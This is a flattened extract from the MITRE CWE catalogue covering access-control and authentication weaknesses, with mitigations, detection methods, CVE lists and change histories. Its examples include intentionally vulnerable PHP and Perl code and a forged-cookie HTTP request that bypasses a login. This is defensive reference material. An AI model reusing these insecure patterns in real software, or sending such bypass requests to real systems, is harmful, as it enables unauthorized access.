access control weaknesses: - - - Specification: incorrect privileges, permissions, ownership, etc. are explicitly specified for either the user or the resource (for example, setting a password file to be world-writable, or giving administrator capabilities to a guest user). This action could be performed by the program or the administrator. - Enforcement: the mechanism contains errors that prevent it from properly enforcing the specified access control requirements (e.g., allowing the user to specify their own privileges, or allowing a syntactically-incorrect ACL to produce insecure settings). This problem occurs within the program itself, in that it does not actually enforce the intended security policy that the administrator specifies. - - - - - - Authorization - The terms "access control" and "authorization" are often used interchangeably, although many people have distinct definitions. The CWE usage of "access control" is intended as a general term for the various mechanisms that restrict which users can access which resources, and "authorization" is more narrowly defined. It is unlikely that there will be community consensus on the use of these terms. - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Operation - - - - - Other - Varies by Context - - - - - Architecture and Design - Operation - Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software. - - - Architecture and Design - Separation of Privilege - - Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. - Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges. - - - - - - CVE-2010-4624 - Bulletin board applies restrictions on number of images during post creation, but does not enforce this on editing. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4624 - - - - File or Directory - - - - Access Control List (ACL) errors - - - 2 - Insufficient Authorization - - - Missing Access Control - - - - - - - - - - - - - - - - - - - - - - - - - - - - This entry needs more work. Possible sub-categories include: - - Trusted group includes undesired entities (partially covered by CWE-286) - Group can perform undesired actions - ACL parse error does not fail closed - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Alternate_Terms, Background_Details, Description, Maintenance_Notes, Name, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Relationships - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-07-27 - updated Alternate_Terms, Relationships - - - CWE Content Team - MITRE - 2009-12-28 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-02-16 - updated References, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-06-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-24 - Critical - Changed name and description; clarified difference between "access control" and "authorization." - - - CWE Content Team - MITRE - 2011-03-29 - updated Alternate_Terms, Background_Details, Description, Maintenance_Notes, Name, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-02-18 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2014-06-23 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Affected_Resources, Modes_of_Introduction, Observed_Examples, References, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated References, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships, Taxonomy_Mappings, Type - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Maintenance_Notes, Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Observed_Examples - - Access Control Issues - Access Control (Authorization) Issues - - - - The software does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action. - - Assuming a user with a given identity, authorization is the process of determining whether that user can access a given resource, based on the user's privileges and any permissions or other access-control specifications that apply to the resource. - When access control checks are not applied consistently - or not at all - users are able to access data or perform actions that they should not be allowed to perform. This can lead to a wide range of problems, including information exposures, denial of service, and arbitrary code execution. - - - - - - - - - - - - An access control list (ACL) represents who/what has permissions to a given object. Different operating systems implement (ACLs) in different ways. In UNIX, there are three types of permissions: read, write, and execute. Users are divided into three classes for file access: owner, group owner, and all other users where each class has a separate set of rights. In Windows NT, there are four basic types of permissions for files: "No access", "Read access", "Change access", and "Full control". Windows NT extends the concept of three types of users in UNIX to include a list of users and groups along with their associated permissions. A user can create an object (file) and assign specified permissions to that object. - - - - AuthZ - "AuthZ" is typically used as an abbreviation of "authorization" within the web application security community. It is distinct from "AuthN" (or, sometimes, "AuthC") which is an abbreviation of "authentication." The use of "Auth" as an abbreviation is discouraged, since it could be used for either authentication or authorization. - - - - - Implementation - - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - A developer may introduce authorization weaknesses because of a lack of understanding about the underlying technologies. For example, a developer may assume that attackers cannot modify certain inputs such as headers or cookies. - - - - Architecture and Design - - Authorization weaknesses may arise when a single-user application is ported to a multi-user environment. - - - - Operation - - - High - - - Confidentiality - Read Application Data - Read Files or Directories - An attacker could read sensitive data, either by reading the data directly from a data store that is not properly restricted, or by accessing insufficiently-protected, privileged functionality to read the data. - - - Integrity - Modify Application Data - Modify Files or Directories - An attacker could modify sensitive data, either by writing the data directly to a data store that is not properly restricted, or by accessing insufficiently-protected, privileged functionality to write the data. - - - Access Control - Gain Privileges or Assume Identity - An attacker could gain privileges by modifying or reading critical data directly, or by accessing insufficiently-protected, privileged functionality. - - - - - Automated Static Analysis - - Automated static analysis is useful for detecting commonly-used idioms for authorization. A tool may be able to analyze related configuration files, such as .htaccess in Apache web servers, or detect the usage of commonly-used authorization libraries. - Generally, automated static analysis tools have difficulty detecting custom authorization schemes. In addition, the software's design may include some functionality that is accessible to any user and does not require an authorization check; an automated technique that detects the absence of authorization may report false positives. - - Limited - - - Automated Dynamic Analysis - Automated dynamic analysis may find many or all possible interfaces that do not require authorization, but manual analysis is required to determine if the lack of authorization violates business logic - - - Manual Analysis - - This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. - Specifically, manual static analysis is useful for evaluating the correctness of custom authorization mechanisms. - - Moderate - These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. However, manual efforts might not achieve desired code coverage within limited time constraints. - - - Manual Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies - - - - - SOAR Partial - - - Dynamic Analysis with Automated Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Web Application Scanner - Web Services Scanner - Database Scanners - - - - - SOAR Partial - - - Dynamic Analysis with Manual Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Host Application Interface Scanner - Fuzz Tester - Framework-based Fuzzer - Forced Path Execution - Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious - - - - - SOAR Partial - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Focused Manual Spotcheck - Focused manual analysis of source - Manual Source Code Review (not inspections) - - - - - SOAR Partial - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Context-configured Source Code Weakness Analyzer - - - - - SOAR Partial - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Formal Methods / Correct-By-Construction - - - Cost effective for partial coverage: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - - - - - High - - - - - Architecture and Design - - Divide the software into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) to enforce the roles at the appropriate boundaries. - Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role. - - - - Architecture and Design - Ensure that you perform access control checks related to your business logic. These checks may be different than the access control checks that you apply to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor. - - - Architecture and Design - Libraries or Frameworks - - Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. - For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45]. - - - - Architecture and Design - - For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page. - One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page. - - - - System Configuration - Installation - Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a "default deny" policy when defining these ACLs. - - - - - This function runs an arbitrary SQL query on a given database, returning the result of the query. - - function runEmployeeQuery($dbName, $name){mysql_select_db($dbName,$globalDbHandle) or die("Could not open Database".$dbName); - //Use a prepared statement to avoid CWE-89 - $preparedStatement = $globalDbHandle->prepare('SELECT * FROM employees WHERE name = :name');$preparedStatement->execute(array(':name' => $name));return $preparedStatement->fetchAll();} - /.../ - - $employeeRecord = runEmployeeQuery('EmployeeDB',$_GET['EmployeeName']); - - While this code is careful to avoid SQL Injection, the function does not confirm the user sending the query is authorized to do so. An attacker may be able to obtain sensitive employee information from the database. - - - The following program could be part of a bulletin board system that allows users to send private messages to each other. This program intends to authenticate the user before deciding whether a private message should be displayed. Assume that LookupMessageObject() ensures that the $id argument is numeric, constructs a filename based on that id, and reads the message details from that file. Also assume that the program stores all private messages for all users in the same directory. - - sub DisplayPrivateMessage {my($id) = @_;my $Message = LookupMessageObject($id);print "From: " . encodeHTML($Message->{from}) . "<br>\n";print "Subject: " . encodeHTML($Message->{subject}) . "\n";print "<hr>\n";print "Body: " . encodeHTML($Message->{body}) . "\n";} - my $q = new CGI; - # For purposes of this example, assume that CWE-309 and - - - - # CWE-523 do not apply. - if (! AuthenticateUser($q->param('username'), $q->param('password'))) {ExitError("invalid username or password");} - my $id = $q->param('id');DisplayPrivateMessage($id); - - While the program properly exits if authentication fails, it does not ensure that the message is addressed to the user. As a result, an authenticated attacker could provide any arbitrary identifier and read private messages that were intended for other users. - One way to avoid this problem would be to ensure that the "to" field in the message object matches the username of the authenticated user. - - - - - CVE-2009-3168 - Web application does not restrict access to admin scripts, allowing authenticated users to reset administrative passwords. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3168 - - - CVE-2009-2960 - Web application does not restrict access to admin scripts, allowing authenticated users to modify passwords of other users. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2960 - - - CVE-2009-3597 - Web application stores database file under the web root with insufficient access control (CWE-219), allowing direct request. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3597 - - - CVE-2009-2282 - Terminal server does not check authorization for guest access. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2282 - - - CVE-2009-3230 - Database server does not use appropriate privileges for certain sensitive operations. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3230 - - - CVE-2009-2213 - Gateway uses default "Allow" configuration for its authorization settings. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2213 - - - CVE-2009-0034 - Chain: product does not properly interpret a configuration option for a system group, allowing users to gain privileges. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0034 - - - CVE-2008-6123 - Chain: SNMP product does not properly parse a configuration option for which hosts are allowed to connect, allowing unauthorized IP addresses to connect. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6123 - - - CVE-2008-5027 - System monitoring software allows users to bypass authorization by creating custom forms. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5027 - - - CVE-2008-7109 - Chain: reliance on client-side security (CWE-602) allows attackers to bypass authorization using a custom client. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7109 - - - CVE-2008-3424 - Chain: product does not properly handle wildcards in an authorization policy list, allowing unintended access. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3424 - - - CVE-2009-3781 - Content management system does not check access permissions for private files, allowing others to view those files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3781 - - - CVE-2008-4577 - ACL-based protection mechanism treats negative access rights as if they are positive, allowing bypass of intended restrictions. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4577 - - - CVE-2008-6548 - Product does not check the ACL of a page accessed using an "include" directive, allowing attackers to read unauthorized files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6548 - - - CVE-2007-2925 - Default ACL list for a DNS server does not set certain ACLs, allowing unauthorized DNS queries. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2925 - - - CVE-2006-6679 - Product relies on the X-Forwarded-For HTTP header for authorization, allowing unintended access by spoofing the header. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6679 - - - CVE-2005-3623 - OS kernel does not check for a certain privilege before setting ACLs for files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3623 - - - CVE-2005-2801 - Chain: file-system code performs an incorrect comparison (CWE-697), preventing default ACLs from being properly applied. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2801 - - - CVE-2001-1155 - Chain: product does not properly check the result of a reverse DNS lookup because of operator precedence (CWE-783), allowing bypass of DNS-based access restrictions. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1155 - - - - - Missing Access Control - - - A10 - Failure to Restrict URL Access - CWE More Specific - - - A2 - Broken Access Control - CWE More Specific - - - SFP35 - Insecure resource access - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-01-12 - updated Common_Consequences, Description, Likelihood_of_Exploit, Name, Other_Notes, Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2009-03-10 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2009-05-27 - updated Description, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2009-07-27 - updated Relationships - - - CWE Content Team - MITRE - 2009-10-29 - updated Type - - - CWE Content Team - MITRE - 2009-12-28 - updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Detection_Factors, Modes_of_Introduction, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2010-02-16 - updated Alternate_Terms, Detection_Factors, Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2010-04-05 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Common_Consequences, References, Relationships - - - CWE Content Team - MITRE - 2010-09-27 - updated Description - - - CWE Content Team - MITRE - 2011-03-24 - Critical - Changed name and description; clarified difference between "access control" and "authorization." - - - CWE Content Team - MITRE - 2011-03-29 - updated Background_Details, Demonstrative_Examples, Description, Name, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-07-17 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated References, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Alternate_Terms - - - CWE Content Team - MITRE - 2021-07-20 - updated Related_Attack_Patterns - - Missing or Inconsistent Access Control - Improper Access Control (Authorization) - - - - The software does not properly manage a user within its environment. - Users can be assigned to the wrong group (class) of permissions resulting in unintended access rights to sensitive objects. - - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Operation - - - - - Other - Varies by Context - - - - - User management errors - - - - The relationships between privileges, permissions, and actors (e.g. users and groups) need further refinement within the Research view. One complication is that these concepts apply to two different pillars, related to control of resources (CWE-664) and protection mechanism failures (CWE-693). - This item needs more work. Possible sub-categories include: user in wrong group, and user with insecure profile or "configuration". It also might be better expressed as a category than a weakness. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Maintenance_Notes, Name, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-03-29 - updated Applicable_Platforms, Maintenance_Notes, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - User Management Issues - - - - When an actor claims to have a given identity, the software does not prove or insufficiently proves that the claim is correct. - - - - - - - - - - authentification - An alternate term is "authentification", which appears to be most commonly used by people from non-English-speaking countries. - - - AuthN - "AuthN" is typically used as an abbreviation of "authentication" within the web application security community. It is also distinct from "AuthZ," which is an abbreviation of "authorization." The use of "Auth" as an abbreviation is discouraged, since it could be used for either authentication or authorization. - - - AuthC - "AuthC" is used as an abbreviation of "authentication," but it appears to used less frequently than "AuthN." - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - High - - - Integrity - Confidentiality - Availability - Access Control - Read Application Data - Gain Privileges or Assume Identity - Execute Unauthorized Code or Commands - This weakness can lead to the exposure of resources or functionality to unintended actors, possibly providing attackers with sensitive information or even execute arbitrary code. - - - - - Automated Static Analysis - - Automated static analysis is useful for detecting certain types of authentication. A tool may be able to analyze related configuration files, such as .htaccess in Apache web servers, or detect the usage of commonly-used authentication libraries. - Generally, automated static analysis tools have difficulty detecting custom authentication schemes. In addition, the software's design may include some functionality that is accessible to any user and does not require an established identity; an automated technique that detects the absence of authentication may report false positives. - - Limited - - - Manual Static Analysis - - This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. - Manual static analysis is useful for evaluating the correctness of custom authentication mechanisms. - - High - These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. - - - Manual Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies - - - - - SOAR Partial - - - Dynamic Analysis with Automated Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Web Application Scanner - Web Services Scanner - Database Scanners - - - - - SOAR Partial - - - Dynamic Analysis with Manual Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Fuzz Tester - Framework-based Fuzzer - - - - - SOAR Partial - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Manual Source Code Review (not inspections) - - - - - SOAR Partial - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Source code Weakness Analyzer - Context-configured Source Code Weakness Analyzer - - - - - SOAR Partial - - - Automated Static Analysis - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Configuration Checker - - - - - SOAR Partial - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - Formal Methods / Correct-By-Construction - - - - - High - - - - - Architecture and Design - Libraries or Frameworks - Use an authentication framework or library such as the OWASP ESAPI Authentication feature. - - - - - The following code intends to ensure that the user is already logged in. If not, the code performs authentication with the user-provided username and password. If successful, it sets the loggedin and user cookies to "remember" that the user has already logged in. Finally, the code performs administrator tasks if the logged-in user has the "Administrator" username, as recorded in the user cookie. - - my $q = new CGI; - if ($q->cookie('loggedin') ne "true") { - if (! AuthenticateUser($q->param('username'), $q->param('password'))) {ExitError("Error: you need to log in first");}else { - # Set loggedin and user cookies.$q->cookie(-name => 'loggedin',-value => 'true'); - $q->cookie(-name => 'user',-value => $q->param('username')); - - } - } - if ($q->cookie('user') eq "Administrator") {DoAdministratorTasks();} - - Unfortunately, this code can be bypassed. The attacker can set the cookies independently so that the code does not check the username and password. The attacker could do this with an HTTP request containing headers such as: - - GET /cgi-bin/vulnerable.cgi HTTP/1.1Cookie: user=AdministratorCookie: loggedin=true - [body of request] - - By setting the loggedin cookie to "true", the attacker bypasses the entire authentication check. By using the "Administrator" value in the user cookie, the attacker also gains privileges to administer the software. - - - In January 2009, an attacker was able to gain administrator access to a Twitter server because the server did not restrict the number of login attempts. The attacker targeted a member of Twitter's support team and was able to successfully guess the member's password using a brute force attack by guessing a large number of common words. After gaining access as the member of the support staff, the attacker used the administrator panel to gain access to 33 accounts that belonged to celebrities and politicians. Ultimately, fake Twitter messages were sent that appeared to come from the compromised accounts. - - - - - - - - CVE-2009-3421 - login script for guestbook allows bypassing authentication by setting a "login_ok" parameter to 1. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3421 - - - CVE-2009-2382 - admin script allows authentication bypass by setting a cookie value to "LOGGEDIN". - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2382 - - - CVE-2009-1048 - VOIP product allows authentication bypass using 127.0.0.1 in the Host header. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1048 - - - CVE-2009-2213 - product uses default "Allow" action, instead of default deny, leading to authentication bypass. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2213 - - - CVE-2009-2168 - chain: redirect without exit (CWE-698) leads to resultant authentication bypass. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2168 - - - CVE-2009-3107 - product does not restrict access to a listening port for a critical service, allowing authentication to be bypassed. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3107 - - - CVE-2009-1596 - product does not properly implement a security-related configuration setting, allowing authentication bypass. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1596 - - - CVE-2009-2422 - authentication routine returns "nil" instead of "false" in some situations, allowing authentication bypass using an invalid username. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2422 - - - CVE-2009-3232 - authentication update script does not properly handle when admin does not select any authentication modules, allowing authentication bypass. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3232 - - - CVE-2009-3231 - use of LDAP authentication with anonymous binds causes empty password to result in successful authentication - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3231 - - - CVE-2005-3435 - product authentication succeeds if user-provided MD5 hash matches the hash in its database; this can be subjected to replay attacks. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3435 - - - CVE-2005-0408 - chain: product generates predictable MD5 hashes using a constant value combined with username, allowing authentication bypass. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0408 - - - - Authentication - - - - Authentication Error - - - A7 - Broken Authentication and Session Management - CWE More Specific - - - A3 - Broken Authentication and Session Management - CWE More Specific - - - 1 - Insufficient Authentication - - - - - - - - - - - - - - - - - - - - - - This can be resultant from SQL injection vulnerabilities and other issues. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Alternate_Terms, Common_Consequences, Relationships, Relationship_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Relationships - - - CWE Content Team - MITRE - 2009-01-12 - updated Name - - - CWE Content Team - MITRE - 2009-05-27 - updated Description, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2009-07-27 - updated Relationships - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences, Observed_Examples - - - CWE Content Team - MITRE - 2009-12-28 - updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Detection_Factors, Likelihood_of_Exploit, References - - - CWE Content Team - MITRE - 2010-02-16 - updated Alternate_Terms, Detection_Factors, Potential_Mitigations, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-06-21 - updated Relationships - - - CWE Content Team - MITRE - 2011-03-29 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2013-07-17 - updated Relationships - - - CWE Content Team - MITRE - 2014-02-18 - updated Relationships - - - CWE Content Team - MITRE - 2014-06-23 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors, Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated References, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2019-06-20 - updated Demonstrative_Examples, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2019-09-19 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Alternate_Terms, Demonstrative_Examples - - - CWE Content Team - MITRE - 2021-07-20 - updated Relationships - - Authentication Issues - Insufficient Authentication - - - - A product requires authentication, but the product has an alternate path or channel that does not require authentication. - - - - - - - - - - - - Architecture and Design - COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. - - - Architecture and Design - This is often seen in web applications that assume that access to a particular CGI program can only be obtained through a "front" screen, when the supporting programs are directly accessible. But this problem is not just in web apps. - - - - - Access Control - Bypass Protection Mechanism - - - - - Architecture and Design - Funnel all access through a single choke point to simplify how users can access a resource. For every access, perform a check to determine if the user has permissions to access the resource. - - - - - CVE-2000-1179 - Router allows remote attackers to read system logs without authentication by directly connecting to the login screen and typing certain control characters. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1179 - - - CVE-1999-1454 - Attackers with physical access to the machine may bypass the password prompt by pressing the ESC (Escape) key. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1454 - - - CVE-1999-1077 - OS allows local attackers to bypass the password protection of idled sessions via the programmer's switch or CMD-PWR keyboard sequence, which brings up a debugger that the attacker can use to disable the lock. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1077 - - - CVE-2003-0304 - Direct request of installation file allows attacker to create administrator accounts. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0304 - - - CVE-2002-0870 - Attackers may gain additional privileges by directly requesting the web management URL. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0870 - - - CVE-2002-0066 - Bypass authentication via direct request to named pipe. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0066 - - - CVE-2003-1035 - User can avoid lockouts by using an API instead of the GUI to conduct brute force password guessing. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1035 - - - - - Authentication Bypass by Alternate Path/Channel - - - A10 - Failure to Restrict URL Access - CWE More Specific - - - - - - - - overlaps Unprotected Alternate Channel - - - - PLOVER - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Modes_of_Introduction, Name, Relationships, Observed_Example, Relationship_Notes, Taxonomy_Mappings, Type - - - CWE Content Team - MITRE - 2008-11-24 - updated Observed_Examples - - - CWE Content Team - MITRE - 2011-03-29 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Observed_Examples, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, 